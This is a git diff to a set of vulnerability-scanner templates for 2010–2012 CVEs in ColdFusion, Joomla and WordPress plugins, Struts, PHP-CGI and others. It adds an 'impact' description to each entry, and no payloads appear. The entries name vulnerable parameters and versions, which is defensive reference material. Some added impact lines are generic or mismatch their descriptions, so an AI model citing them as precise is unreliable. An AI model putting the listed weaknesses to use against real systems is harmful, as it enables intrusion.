- https://www.exploit-db.com/exploits/14274 diff --git a/http/cves/2010/CVE-2010-2861.yaml b/http/cves/2010/CVE-2010-2861.yaml index cf8ddad9ab..2e6030ecb5 100644 --- a/http/cves/2010/CVE-2010-2861.yaml +++ b/http/cves/2010/CVE-2010-2861.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: Multiple directory traversal vulnerabilities in the administrator console in Adobe ColdFusion 9.0.1 and earlier allow remote attackers to read arbitrary files via the locale parameter to (1) CFIDE/administrator/settings/mappings.cfm, (2) logging/settings.cfm, (3) datasources/index.cfm, (4) j2eepackaging/editarchive.cfm, and (5) enter.cfm in CFIDE/administrator/. + impact: | + This vulnerability can lead to unauthorized access to sensitive information and potential compromise of the affected system. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861 diff --git a/http/cves/2010/CVE-2010-2918.yaml b/http/cves/2010/CVE-2010-2918.yaml index 96cd1d53d3..6e8db16bbe 100644 --- a/http/cves/2010/CVE-2010-2918.yaml +++ b/http/cves/2010/CVE-2010-2918.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A PHP remote file inclusion vulnerability in core/include/myMailer.class.php in the Visites (com_joomla-visites) component 1.1 RC2 for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter. + impact: | + Remote file inclusion vulnerability in Joomla! Component Visites 1.1 allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/31708 diff --git a/http/cves/2010/CVE-2010-3203.yaml b/http/cves/2010/CVE-2010-3203.yaml index 9be091cbe4..b652d1b9a3 100644 --- a/http/cves/2010/CVE-2010-3203.yaml +++ b/http/cves/2010/CVE-2010-3203.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the PicSell (com_picsell) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dflink parameter in a prevsell dwnfree action to index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to retrieve arbitrary files from the server. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/14845 diff --git a/http/cves/2010/CVE-2010-3426.yaml b/http/cves/2010/CVE-2010-3426.yaml index 3c38addf26..182c52d4cd 100644 --- a/http/cves/2010/CVE-2010-3426.yaml +++ b/http/cves/2010/CVE-2010-3426.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in jphone.php in the JPhone (com_jphone) component 1.0 Alpha 3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/14964 diff --git a/http/cves/2010/CVE-2010-4231.yaml b/http/cves/2010/CVE-2010-4231.yaml index 9f54a500c0..c3cf338336 100644 --- a/http/cves/2010/CVE-2010-4231.yaml +++ b/http/cves/2010/CVE-2010-4231.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: The CMNC-200 IP Camera has a built-in web server that is vulnerable to directory transversal attacks, allowing access to any file on the camera file system. + impact: | + An attacker can exploit this vulnerability to access sensitive files and directories on the camera. remediation: Upgrade to a supported product version. reference: - https://nvd.nist.gov/vuln/detail/CVE-2010-4231 diff --git a/http/cves/2010/CVE-2010-4239.yaml b/http/cves/2010/CVE-2010-4239.yaml index ee437547ef..e6ad3bf59c 100644 --- a/http/cves/2010/CVE-2010-4239.yaml +++ b/http/cves/2010/CVE-2010-4239.yaml @@ -5,6 +5,8 @@ info: author: 0x_akoko severity: critical description: Tiki Wiki CMS Groupware 5.2 is susceptible to a local file inclusion vulnerability. + impact: | + The LFI vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing for further exploitation. remediation: | Upgrade Tiki Wiki CMS Groupware to a version that is not affected by the CVE-2010-4239 vulnerability. reference: diff --git a/http/cves/2010/CVE-2010-4282.yaml b/http/cves/2010/CVE-2010-4282.yaml index a4e9d21c96..9e1c6beb0a 100644 --- a/http/cves/2010/CVE-2010-4282.yaml +++ b/http/cves/2010/CVE-2010-4282.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: Multiple directory traversal vulnerabilities in Pandora FMS before 3.1.1 allow remote attackers to include and execute arbitrary local files via (1) the page parameter to ajax.php or (2) the id parameter to general/pandora_help.php, and allow remote attackers to include and execute, create, modify, or delete arbitrary local files via (3) the layout parameter to operation/agentes/networkmap.php. + impact: | + An attacker can exploit this vulnerability to access sensitive files containing confidential information, such as configuration files or user credentials. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/15643 diff --git a/http/cves/2010/CVE-2010-4617.yaml b/http/cves/2010/CVE-2010-4617.yaml index 75c9e2387b..44f7acd0ae 100644 --- a/http/cves/2010/CVE-2010-4617.yaml +++ b/http/cves/2010/CVE-2010-4617.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the JotLoader (com_jotloader) component 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/15791 diff --git a/http/cves/2010/CVE-2010-4719.yaml b/http/cves/2010/CVE-2010-4719.yaml index 28f82304dc..44dc32c65e 100644 --- a/http/cves/2010/CVE-2010-4719.yaml +++ b/http/cves/2010/CVE-2010-4719.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in JRadio (com_jradio) component before 1.5.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to further compromise. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/15749 diff --git a/http/cves/2010/CVE-2010-4769.yaml b/http/cves/2010/CVE-2010-4769.yaml index 14f22c3079..2fb2e3aec2 100644 --- a/http/cves/2010/CVE-2010-4769.yaml +++ b/http/cves/2010/CVE-2010-4769.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Jimtawl (com_jimtawl) component 1.0.2 Joomla! allows remote attackers to read arbitrary files and possibly unspecified other impacts via a .. (dot dot) in the task parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/15585 diff --git a/http/cves/2010/CVE-2010-4977.yaml b/http/cves/2010/CVE-2010-4977.yaml index ad78593d78..d6ed848688 100644 --- a/http/cves/2010/CVE-2010-4977.yaml +++ b/http/cves/2010/CVE-2010-4977.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A SQL injection vulnerability in menu.php in the Canteen (com_canteen) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the mealid parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/34250 diff --git a/http/cves/2010/CVE-2010-5028.yaml b/http/cves/2010/CVE-2010-5028.yaml index eea4df86bd..e1d981a840 100644 --- a/http/cves/2010/CVE-2010-5028.yaml +++ b/http/cves/2010/CVE-2010-5028.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A SQL injection vulnerability in the JExtensions JE Job (com_jejob) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the catid parameter in an item action to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12601 diff --git a/http/cves/2010/CVE-2010-5278.yaml b/http/cves/2010/CVE-2010-5278.yaml index 2b51c75d92..7d10092cc1 100644 --- a/http/cves/2010/CVE-2010-5278.yaml +++ b/http/cves/2010/CVE-2010-5278.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl and possibly earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter when magic_quotes_gpc is disabled. + impact: | + An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to unauthorized access or sensitive information disclosure. remediation: | Apply the latest patches and updates provided by MODx to fix the LFI vulnerability. reference: diff --git a/http/cves/2010/CVE-2010-5286.yaml b/http/cves/2010/CVE-2010-5286.yaml index 7d26a64bca..675c556226 100644 --- a/http/cves/2010/CVE-2010-5286.yaml +++ b/http/cves/2010/CVE-2010-5286.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: critical description: A directory traversal vulnerability in Jstore (com_jstore) component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + Arbitrary file inclusion leading to remote code execution remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/34837 diff --git a/http/cves/2011/CVE-2011-0049.yaml b/http/cves/2011/CVE-2011-0049.yaml index 1cf893689a..b1df3b2328 100644 --- a/http/cves/2011/CVE-2011-0049.yaml +++ b/http/cves/2011/CVE-2011-0049.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: A directory traversal vulnerability in the _list_file_get function in lib/Majordomo.pm in Majordomo 2 before 20110131 allows remote attackers to read arbitrary files via .. (dot dot) sequences in the help command, as demonstrated using (1) a crafted email and (2) cgi-bin/mj_wwwusr in the web interface. + impact: | + This vulnerability can lead to unauthorized access to sensitive files and data on the server. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/16103 diff --git a/http/cves/2011/CVE-2011-1669.yaml b/http/cves/2011/CVE-2011-1669.yaml index 5595d42765..78fa577bc0 100644 --- a/http/cves/2011/CVE-2011-1669.yaml +++ b/http/cves/2011/CVE-2011-1669.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in wp-download.php in the WP Custom Pages module 0.5.0.1 for WordPress allows remote attackers to read arbitrary files via ..%2F (encoded dot dot) sequences in the url parameter. + impact: | + An attacker can read arbitrary files on the server, potentially leading to unauthorized access to sensitive information. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1669 diff --git a/http/cves/2011/CVE-2011-2744.yaml b/http/cves/2011/CVE-2011-2744.yaml index 3fb06048f0..97807de981 100644 --- a/http/cves/2011/CVE-2011-2744.yaml +++ b/http/cves/2011/CVE-2011-2744.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in Chyrp 2.1 and earlier allows remote attackers to include and execute arbitrary local files via a ..%2F (encoded dot dot slash) in the action parameter to the default URI. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, or complete compromise of the affected system. remediation: | Upgrade Chyrp to the latest version or apply the necessary patches provided by the vendor. reference: diff --git a/http/cves/2011/CVE-2011-2780.yaml b/http/cves/2011/CVE-2011-2780.yaml index 6cf391a790..407fec865a 100644 --- a/http/cves/2011/CVE-2011-2780.yaml +++ b/http/cves/2011/CVE-2011-2780.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in includes/lib/gz.php in Chyrp 2.0 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter, a different vulnerability than CVE-2011-2744. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - http://www.justanotherhacker.com/advisories/JAHx113.txt diff --git a/http/cves/2011/CVE-2011-3315.yaml b/http/cves/2011/CVE-2011-3315.yaml index a9be84307a..320764f5e5 100644 --- a/http/cves/2011/CVE-2011-3315.yaml +++ b/http/cves/2011/CVE-2011-3315.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in Cisco Unified Communications Manager (CUCM) 5.x and 6.x before 6.1(5)SU2, 7.x before 7.1(5b)SU2, and 8.x before 8.0(3), and Cisco Unified Contact Center Express (aka Unified CCX or UCCX) and Cisco Unified IP Interactive Voice Response (Unified IP-IVR) before 6.0(1)SR1ES8, 7.0(x) before 7.0(2)ES1, 8.0(x) through 8.0(2)SU3, and 8.5(x) before 8.5(1)SU2, allows remote attackers to read arbitrary files via a crafted URL, aka Bug IDs CSCth09343 and CSCts44049. + impact: | + An attacker can exploit this vulnerability to access sensitive files and directories on the affected system. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/36256 diff --git a/http/cves/2011/CVE-2011-4336.yaml b/http/cves/2011/CVE-2011-4336.yaml index 2386f992e0..b72d1f3978 100644 --- a/http/cves/2011/CVE-2011-4336.yaml +++ b/http/cves/2011/CVE-2011-4336.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Tiki Wiki CMS Groupware 7.0 is vulnerable to cross-site scripting via the GET "ajax" parameter to snarf_ajax.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2011-4336 diff --git a/http/cves/2011/CVE-2011-4618.yaml b/http/cves/2011/CVE-2011-4618.yaml index 446f0cfe98..26b3454955 100644 --- a/http/cves/2011/CVE-2011-4618.yaml +++ b/http/cves/2011/CVE-2011-4618.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting (XSS) vulnerability in advancedtext.php in Advanced Text Widget plugin before 2.0.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter. + impact: | + Allows remote attackers to execute arbitrary script or HTML code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2011-4618 diff --git a/http/cves/2011/CVE-2011-4624.yaml b/http/cves/2011/CVE-2011-4624.yaml index 29a2aa9f8c..53f3d2871b 100644 --- a/http/cves/2011/CVE-2011-4624.yaml +++ b/http/cves/2011/CVE-2011-4624.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting (XSS) vulnerability in facebook.php in the GRAND FlAGallery plugin (flash-album-gallery) before 1.57 for WordPress allows remote attackers to inject arbitrary web script or HTML via the i parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2011-4624 diff --git a/http/cves/2011/CVE-2011-4804.yaml b/http/cves/2011/CVE-2011-4804.yaml index 22b9d25e63..f3f45d2cf5 100644 --- a/http/cves/2011/CVE-2011-4804.yaml +++ b/http/cves/2011/CVE-2011-4804.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the obSuggest (com_obsuggest) component before 1.8 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + The vulnerability allows an attacker to include arbitrary local files, leading to unauthorized access to sensitive information or remote code execution. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/36598 diff --git a/http/cves/2011/CVE-2011-4926.yaml b/http/cves/2011/CVE-2011-4926.yaml index 5e7c30dce0..e2e86f9683 100644 --- a/http/cves/2011/CVE-2011-4926.yaml +++ b/http/cves/2011/CVE-2011-4926.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in adminimize/adminimize_page.php in the Adminimize plugin before 1.7.22 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter. + impact: | + Allows attackers to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions. remediation: | Update to the latest version of Adminimize plugin (1.7.22) or apply the necessary patches to fix the XSS vulnerability. reference: diff --git a/http/cves/2011/CVE-2011-5106.yaml b/http/cves/2011/CVE-2011-5106.yaml index 742dd8123d..85596ddc3d 100644 --- a/http/cves/2011/CVE-2011-5106.yaml +++ b/http/cves/2011/CVE-2011-5106.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in edit-post.php in the Flexible Custom Post Type plugin before 0.1.7 for WordPress allows remote attackers to inject arbitrary web script or HTML via the id parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions. remediation: | Update to the latest version of the plugin (version 0.1.8 or higher) which includes a fix for this vulnerability. reference: diff --git a/http/cves/2011/CVE-2011-5107.yaml b/http/cves/2011/CVE-2011-5107.yaml index 8b93edda3b..2c0fdc0f60 100644 --- a/http/cves/2011/CVE-2011-5107.yaml +++ b/http/cves/2011/CVE-2011-5107.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in post_alert.php in Alert Before Your Post plugin, possibly 0.1.1 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the name parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the Alert Before Your Post plugin (0.1.1) or remove the plugin if it is not necessary for the website's functionality. reference: diff --git a/http/cves/2011/CVE-2011-5179.yaml b/http/cves/2011/CVE-2011-5179.yaml index f57c5b7698..18edcf1c1e 100644 --- a/http/cves/2011/CVE-2011-5179.yaml +++ b/http/cves/2011/CVE-2011-5179.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in skysa-official/skysa.php in Skysa App Bar Integration plugin, possibly before 1.04, for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of Skysa App Bar or apply appropriate security controls to sanitize user input and prevent XSS attacks. reference: diff --git a/http/cves/2011/CVE-2011-5181.yaml b/http/cves/2011/CVE-2011-5181.yaml index 917c82bd28..6f84c6a265 100644 --- a/http/cves/2011/CVE-2011-5181.yaml +++ b/http/cves/2011/CVE-2011-5181.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the ClickDesk Live Support Live Chat plugin to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2011/CVE-2011-5252.yaml b/http/cves/2011/CVE-2011-5252.yaml index 42a43d48cf..bf12f57689 100644 --- a/http/cves/2011/CVE-2011-5252.yaml +++ b/http/cves/2011/CVE-2011-5252.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Open redirect vulnerability in Users/Account/LogOff in Orchard 1.0.x before 1.0.21, 1.1.x before 1.1.31, 1.2.x before 1.2.42, and 1.3.x before 1.3.10 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the ReturnUrl parameter. + impact: | + An attacker can craft a malicious URL to redirect users to a malicious website, leading to phishing attacks. remediation: | Validate and sanitize user input for the 'ReturnUrl' parameter to prevent open redirect vulnerabilities. reference: diff --git a/http/cves/2011/CVE-2011-5265.yaml b/http/cves/2011/CVE-2011-5265.yaml index 3e404ca69e..7211282430 100644 --- a/http/cves/2011/CVE-2011-5265.yaml +++ b/http/cves/2011/CVE-2011-5265.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in cached_image.php in the Featurific For WordPress plugin 1.6.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the snum parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the Featurific For WordPress plugin (1.6.2) or apply the vendor-supplied patch to fix the vulnerability. reference: diff --git a/http/cves/2012/CVE-2012-0392.yaml b/http/cves/2012/CVE-2012-0392.yaml index 6e96f6924b..b6ea58cfa0 100644 --- a/http/cves/2012/CVE-2012-0392.yaml +++ b/http/cves/2012/CVE-2012-0392.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method. + impact: | + Successful exploitation of this vulnerability can lead to remote code execution on the affected server. remediation: Developers should immediately upgrade to at least Struts 2.3.18. reference: - https://cwiki.apache.org/confluence/display/WW/S2-008 https://blog.csdn.net/weixin_43416469/article/details/113850545 diff --git a/http/cves/2012/CVE-2012-0394.yaml b/http/cves/2012/CVE-2012-0394.yaml index 6a669559e5..c586f899c4 100644 --- a/http/cves/2012/CVE-2012-0394.yaml +++ b/http/cves/2012/CVE-2012-0394.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Apache Struts before 2.3.1.1 is susceptible to remote code execution. When developer mode is used in the DebuggingInterceptor component, a remote attacker can execute arbitrary OGNL commands via unspecified vectors, which can allow for execution of malware, obtaining sensitive information, modifying data, and/or gaining full control over a compromised system without entering necessary credentials.. NOTE: the vendor characterizes this behavior as not "a security vulnerability itself." + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected server. remediation: | Upgrade Apache Struts to a version higher than 2.3.1.1 or apply the necessary patches. reference: diff --git a/http/cves/2012/CVE-2012-0896.yaml b/http/cves/2012/CVE-2012-0896.yaml index ec829749af..d47b70f7f3 100644 --- a/http/cves/2012/CVE-2012-0896.yaml +++ b/http/cves/2012/CVE-2012-0896.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: An absolute path traversal vulnerability in download.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to read arbitrary files via the f parameter. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access, data leakage, or further compromise of the system. remediation: | Upgrade to a patched version of the Count Per Day plugin (version 3.2 or above) or apply the vendor-supplied patch to fix the path traversal vulnerability. reference: diff --git a/http/cves/2012/CVE-2012-0901.yaml b/http/cves/2012/CVE-2012-0901.yaml index 0e2e728709..e2e2cbade6 100644 --- a/http/cves/2012/CVE-2012-0901.yaml +++ b/http/cves/2012/CVE-2012-0901.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in yousaytoo.php in YouSayToo auto-publishing plugin 1.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2012/CVE-2012-0981.yaml b/http/cves/2012/CVE-2012-0981.yaml index b33ab3000b..b59cd4315b 100644 --- a/http/cves/2012/CVE-2012-0981.yaml +++ b/http/cves/2012/CVE-2012-0981.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in phpShowtime 2.0 allows remote attackers to list arbitrary directories and image files via a .. (dot dot) in the r parameter to index.php. + impact: | + An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to unauthorized access or sensitive information disclosure. remediation: | Upgrade to a patched version of phpShowtime or apply the necessary security patches to fix the directory traversal vulnerability. reference: diff --git a/http/cves/2012/CVE-2012-0991.yaml b/http/cves/2012/CVE-2012-0991.yaml index 44d840b3f6..819907bb7e 100644 --- a/http/cves/2012/CVE-2012-0991.yaml +++ b/http/cves/2012/CVE-2012-0991.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: low description: Multiple directory traversal vulnerabilities in OpenEMR 4.1.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the formname parameter to (1) contrib/acog/print_form.php; or (2) load_form.php, (3) view_form.php, or (4) trend_form.php in interface/patient_file/encounter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: | Apply the latest security patches or upgrade to a newer version of OpenEMR. reference: diff --git a/http/cves/2012/CVE-2012-0996.yaml b/http/cves/2012/CVE-2012-0996.yaml index 1134d23017..f718df0eca 100644 --- a/http/cves/2012/CVE-2012-0996.yaml +++ b/http/cves/2012/CVE-2012-0996.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Multiple directory traversal vulnerabilities in 11in1 1.2.1 stable 12-31-2011 allow remote attackers to read arbitrary files via a .. (dot dot) in the class parameter to (1) index.php or (2) admin/index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, and compromise of the affected system. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/36784 diff --git a/http/cves/2012/CVE-2012-1226.yaml b/http/cves/2012/CVE-2012-1226.yaml index 76416fd698..2b9c7296e1 100644 --- a/http/cves/2012/CVE-2012-1226.yaml +++ b/http/cves/2012/CVE-2012-1226.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: Multiple directory traversal vulnerabilities in Dolibarr CMS 3.2.0 Alpha allow remote attackers to read arbitrary files and possibly execute arbitrary code via a .. (dot dot) in the (1) file parameter to document.php or (2) backtopage parameter in a create action to comm/action/fiche.php. + impact: | + Successful exploitation of these vulnerabilities could allow an attacker to read arbitrary files from the server, potentially leading to unauthorized access or sensitive information disclosure. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/36873 diff --git a/http/cves/2012/CVE-2012-1823.yaml b/http/cves/2012/CVE-2012-1823.yaml index 8393c0b888..3b8a88d856 100644 --- a/http/cves/2012/CVE-2012-1823.yaml +++ b/http/cves/2012/CVE-2012-1823.yaml @@ -6,6 +6,8 @@ info: severity: high description: | sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case. + impact: | + Remote code execution remediation: | Upgrade to a patched version of PHP or apply the necessary security patches. reference: diff --git a/http/cves/2012/CVE-2012-1835.yaml b/http/cves/2012/CVE-2012-1835.yaml index ae574af284..b5c08953db 100644 --- a/http/cves/2012/CVE-2012-1835.yaml +++ b/http/cves/2012/CVE-2012-1835.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Multiple cross-site scripting vulnerabilities in the All-in-One Event Calendar plugin 1.4 and 1.5 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) title parameter to app/view/agenda-widget-form.php; (2) args, (3) title, (4) before_title, or (5) after_title parameter to app/view/agenda-widget.php; (6) button_value parameter to app/view/box_publish_button.php; or (7) msg parameter to /app/view/save_successful.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, leading to potential data theft, session hijacking, or defacement. remediation: | Update to the latest version of the All-in-One Event Calendar plugin to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2012/CVE-2012-2371.yaml b/http/cves/2012/CVE-2012-2371.yaml index 750de02ed3..5b25f5d346 100644 --- a/http/cves/2012/CVE-2012-2371.yaml +++ b/http/cves/2012/CVE-2012-2371.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in index.php in the WP-FaceThumb plugin 0.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the pagination_wp_facethumb parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions. remediation: | Update to the latest version of the WP-FaceThumb plugin (0.2 or higher) which includes proper input sanitization to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2012/CVE-2012-3153.yaml b/http/cves/2012/CVE-2012-3153.yaml index 68d545a05d..4e43ce956a 100644 --- a/http/cves/2012/CVE-2012-3153.yaml +++ b/http/cves/2012/CVE-2012-3153.yaml @@ -8,6 +8,8 @@ info: An unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4, 11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Report Server Component. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized remote code execution. remediation: | Apply the necessary patches and updates provided by Oracle to mitigate this vulnerability. reference: diff --git a/http/cves/2012/CVE-2012-4032.yaml b/http/cves/2012/CVE-2012-4032.yaml index c62d9ecca4..bd41fd09b0 100644 --- a/http/cves/2012/CVE-2012-4032.yaml +++ b/http/cves/2012/CVE-2012-4032.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Open redirect vulnerability in the login page in WebsitePanel before 1.2.2.1 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in 